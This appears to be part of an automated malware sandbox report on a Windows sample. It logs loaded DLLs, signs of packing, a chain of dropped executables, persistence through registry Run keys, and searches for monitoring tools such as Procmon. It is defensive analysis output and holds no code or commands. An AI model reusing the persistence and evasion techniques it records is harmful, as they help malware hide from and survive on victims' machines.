Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3027456 > 1048576
Source: file.exe Static PE information: Raw size of oxcwbfly is bigger than: 0x100000 < 0x2b7800
Source: Binary string: my_library.pdbU source: 996773cd54.exe, 0000000A.00000003.2771688785.0000000004EDB000.00000004.00001000.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2819953969.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 0000001A.00000000.2858043384.000000000088C000.00000008.00000001.01000000.00000012.sdmp, 996773cd54.exe, 0000001D.00000002.3005019658.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000003.2911813021.0000000004CBB000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000024.00000000.3066269323.000000000088C000.00000008.00000001.01000000.00000012.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 996773cd54.exe, 0000000A.00000003.2771688785.0000000004EDB000.00000004.00001000.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2819953969.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 0000001A.00000000.2858043384.000000000088C000.00000008.00000001.01000000.00000012.sdmp, 996773cd54.exe, 0000001D.00000002.3005019658.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000003.2911813021.0000000004CBB000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000024.00000000.3066269323.000000000088C000.00000008.00000001.01000000.00000012.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: CT1ROX8L8OCI432H.exe, 00000003.00000002.2412866418.00000000002C2000.00000040.00000001.01000000.00000006.sdmp, CT1ROX8L8OCI432H.exe, 00000003.00000003.2278913650.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, QEDBGN5ZBSJ2P7FMKVJ.exe, 00000022.00000003.3041419710.0000000004F70000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Unpacked PE file: 3.2.CT1ROX8L8OCI432H.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W;cfyesryy:EW;gwntuilp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Unpacked PE file: 4.2.R4UI5PZ4W045Z6XA.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xywzvhpg:EW;guxxlfzw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Unpacked PE file: 10.2.996773cd54.exe.cd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xugdxrgk:EW;ygzrgnus:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xugdxrgk:EW;ygzrgnus:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Unpacked PE file: 29.2.996773cd54.exe.cd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xugdxrgk:EW;ygzrgnus:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xugdxrgk:EW;ygzrgnus:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: real checksum: 0x1d9483 should be: 0x1dd58a
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: real checksum: 0x2a786b should be: 0x2a96e2
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e391c should be: 0x2ee1cb
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: real checksum: 0x2a786b should be: 0x2a96e2
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x2194f4 should be: 0x2179df
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1d9483 should be: 0x1dd58a
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: real checksum: 0x2a786b should be: 0x2a96e2
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: real checksum: 0x1d9483 should be: 0x1dd58a
Source: 996773cd54.exe.8.dr Static PE information: real checksum: 0x2194f4 should be: 0x2179df
Source: file.exe Static PE information: real checksum: 0x2e391c should be: 0x2ee1cb
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: real checksum: 0x1d9483 should be: 0x1dd58a
Source: 21024c5511.exe.8.dr Static PE information: real checksum: 0x2e391c should be: 0x2ee1cb
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: oxcwbfly
Source: file.exe Static PE information: section name: bkmxxdia
Source: file.exe Static PE information: section name: .taggant
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name:
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: .idata
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: cfyesryy
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: gwntuilp
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: .taggant
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name:
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: .idata
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name:
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: xywzvhpg
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: guxxlfzw
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: xywzvhpg
Source: skotes.exe.4.dr Static PE information: section name: guxxlfzw
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: oxcwbfly
Source: random[1].exe.8.dr Static PE information: section name: bkmxxdia
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 21024c5511.exe.8.dr Static PE information: section name:
Source: 21024c5511.exe.8.dr Static PE information: section name: .idata
Source: 21024c5511.exe.8.dr Static PE information: section name: oxcwbfly
Source: 21024c5511.exe.8.dr Static PE information: section name: bkmxxdia
Source: 21024c5511.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: xugdxrgk
Source: random[1].exe0.8.dr Static PE information: section name: ygzrgnus
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 996773cd54.exe.8.dr Static PE information: section name:
Source: 996773cd54.exe.8.dr Static PE information: section name: .rsrc
Source: 996773cd54.exe.8.dr Static PE information: section name: .idata
Source: 996773cd54.exe.8.dr Static PE information: section name:
Source: 996773cd54.exe.8.dr Static PE information: section name: xugdxrgk
Source: 996773cd54.exe.8.dr Static PE information: section name: ygzrgnus
Source: 996773cd54.exe.8.dr Static PE information: section name: .taggant
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name:
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: .idata
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: cfyesryy
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: gwntuilp
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: .taggant
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name:
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: .idata
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name:
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: xywzvhpg
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: guxxlfzw
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: .taggant
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name:
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: .idata
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name:
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: xywzvhpg
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: guxxlfzw
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: .taggant
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name:
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: .idata
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: cfyesryy
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: gwntuilp
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01775E2D push ds; retf 0_3_01775E2E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01775E2D push ds; retf 0_3_01775E2E
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01775FD4 push esi; iretd 0_3_01775FD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01775FD4 push esi; iretd 0_3_01775FD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01795AD2 pushfd ; ret 0_3_01795B04
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017959CA push ecx; retf 0_3_017959F0
Source: file.exe Static PE information: section name: entropy: 7.984163061958727
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: entropy: 7.80234292244424
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: entropy: 7.9821636409967445
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: xywzvhpg entropy: 7.953795861544427
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.9821636409967445
Source: skotes.exe.4.dr Static PE information: section name: xywzvhpg entropy: 7.953795861544427
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.984163061958727
Source: 21024c5511.exe.8.dr Static PE information: section name: entropy: 7.984163061958727
Source: random[1].exe0.8.dr Static PE information: section name: xugdxrgk entropy: 7.954124666986544
Source: 996773cd54.exe.8.dr Static PE information: section name: xugdxrgk entropy: 7.954124666986544
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: entropy: 7.80234292244424
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: entropy: 7.9821636409967445
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: xywzvhpg entropy: 7.953795861544427
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: entropy: 7.9821636409967445
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: xywzvhpg entropy: 7.953795861544427
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: entropy: 7.80234292244424
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File created: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File created: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File created: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File created: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21024c5511.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 996773cd54.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 036e90e395.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
